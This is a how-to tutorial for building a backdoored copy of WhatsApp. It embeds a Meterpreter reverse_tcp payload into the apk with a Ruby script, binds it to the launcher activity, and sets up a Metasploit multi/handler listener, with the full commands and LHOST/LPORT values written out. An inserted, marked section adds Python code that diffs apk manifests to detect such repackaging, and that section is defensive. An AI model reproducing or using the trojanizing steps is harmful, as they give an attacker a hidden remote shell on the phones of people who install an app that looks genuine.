To install the required libraries, enter this command at the console:
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
And to get the latest version of ApkTool, head over to this site and follow the installation instructions: Link
First of all, grab the original apk from any of the numerous websites available. Just do a Google search for "app_name apk download" and Google will come up with a lot of results. Save that apk in any folder; in this tutorial I will use the root folder and a WhatsApp.apk as the example.
Download the Ruby script from this link and save it in the same folder as the original apk: Link
Open a terminal, and type the following command:
ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895
In this example I've used 192.168.0.104 as the local IP address, i.e. your own IP address, and 4895 as the port on your computer through which the Meterpreter payload will connect back to you. Make sure to change these to the appropriate values, especially the IP; LPORT can be set to any reasonable port number.
Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more often than not it cannot determine which Activity of the app it should bind the payload to, so it asks you to select it. In that case, leave the terminal with the script at the prompt and browse to /root/original.
Then open the AndroidManifest.xml file using any text editor of your liking and look for an <activity> tag which contains both the strings '.MAIN' and '.LAUNCHER'. When you find that tag, look for its 'android:name' attribute and note the name of that Activity.
At the prompt of the Ruby script, enter the number corresponding to the Activity name you noted previously and press Enter.
This is the hardest step of all, so I'm also posting some screenshots to make your life easier.
If you did everything correctly, you should now have an apk file in your root directory with the name 'backdoored_WhatsApp.apk'. It will install and run like the original app.
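The resulting apk "runs like the original", but its decoded AndroidManifest.xml is not identical to the original's. The following added example (my own code, not part of this post or the script it uses) shows the check an auditor would run on a suspect apk: decode both the trusted and the suspect apk and diff the manifests for added permissions and added components. The two manifests below are constructed samples, and com.example.hypothetical.Stage is a made-up component name.

```python
import xml.etree.ElementTree as ET

# Attribute names in an Android manifest live in the android: namespace.
ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"


def manifest_components(xml_text):
    """Return (package, set of permissions, set of (kind, name) components)."""
    root = ET.fromstring(xml_text)
    perms = {e.get(NAME) for e in root.iter("uses-permission")}
    comps = set()
    for kind in ("activity", "service", "receiver", "provider"):
        for e in root.iter(kind):
            comps.add((kind, e.get(NAME)))
    return root.get("package"), perms, comps


def manifest_diff(trusted_xml, suspect_xml):
    """Report what the suspect manifest declares that the trusted one does not."""
    pkg_t, perms_t, comps_t = manifest_components(trusted_xml)
    pkg_s, perms_s, comps_s = manifest_components(suspect_xml)
    return {
        "package_changed": pkg_t != pkg_s,
        "added_permissions": sorted(perms_s - perms_t),
        "added_components": sorted(comps_s - comps_t),
    }


# Constructed sample manifest of a trusted build (not a real app's manifest).
TRUSTED = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.chat">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <activity android:name="com.example.chat.Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

# Constructed suspect copy: same package, one extra permission and one extra
# service (hypothetical name) that a repackaged build would add.
SUSPECT = TRUSTED.replace(
    "</application>",
    '    <service android:name="com.example.hypothetical.Stage"/>\n  </application>',
).replace(
    '<uses-permission android:name="android.permission.INTERNET"/>',
    '<uses-permission android:name="android.permission.INTERNET"/>\n'
    '  <uses-permission android:name="android.permission.READ_SMS"/>',
)

if __name__ == "__main__":
    print(manifest_diff(TRUSTED, SUSPECT))
```

Any non-empty list in the report, or a changed package name, means the apk is not the build it claims to be and warrants a closer look; an unchanged manifest does not prove the opposite, since code can be altered without touching it.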
As for the listener, you should use exploit/multi/handler and set the corresponding options to match the values you passed to the script. Just run the following commands:
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895